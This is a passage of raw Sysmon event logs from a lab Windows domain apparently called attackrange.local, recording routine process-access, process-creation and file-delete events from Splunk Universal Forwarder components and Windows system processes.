16:33:25.137{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061934Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:25.137{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061933Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:25.137{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061932Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:25.137{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061931Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:25.137{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-52D5-6063-4D01-00000000AF01}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061930Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:25.137{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-52D5-6063-4D01-00000000AF01}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061929Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:25.139{7F8C56E7-52D5-6063-4D01-00000000AF01}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246663Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:25.382{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90AA9D6E522FE6041F88114691A76208,SHA256=671E36C3100C6F42BA9E55834927F53EF11DFD676D37ED632BA2F3B40BEF4663,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246662Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:25.367{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C85D51101F2D13F68E8952EB52D2011D,SHA256=1450516DC7A39C2585A08049A9B413D508423093E31C874FBE9CFD7D82854350,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061955Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:26.634{7F8C56E7-52D6-6063-4F01-00000000AF01}52925716C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001061954Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:26.494{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D3E5772D5662C2640D83E6C6E2546C4,SHA256=A828EBDCC968169999121DE0781CAC182637AC29F9C22430AA75BA2E0D93191B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061953Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:26.494{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-52D6-6063-4F01-00000000AF01}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061952Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:26.494{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061951Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:26.494{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061950Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:26.494{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061949Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:26.494{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061948Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:26.494{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-52D6-6063-4F01-00000000AF01}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061947Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:26.494{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-52D6-6063-4F01-00000000AF01}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061946Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:26.495{7F8C56E7-52D6-6063-4F01-00000000AF01}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246664Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:26.413{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5617DC70DAE2D575A64B4C313AE1DA0,SHA256=220E7EC412E46BA42BD8222C53BACCCD554FD70D7911097A18524A947C6308F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061973Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.887{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6896A665EC7D2E5060FF2874E2392F5,SHA256=33344E50EAB118199C80EA046494B7BE376CDCC316EEB9DD09A89B6F0E0AECE6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061972Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.887{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-52D7-6063-5101-00000000AF01}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061971Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.887{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061970Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.887{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061969Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.887{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061968Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.887{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061967Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.887{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-52D7-6063-5101-00000000AF01}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061966Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.887{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-52D7-6063-5101-00000000AF01}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061965Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.889{7F8C56E7-52D7-6063-5101-00000000AF01}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001061964Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.325{7F8C56E7-52D7-6063-5001-00000000AF01}56645968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061963Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 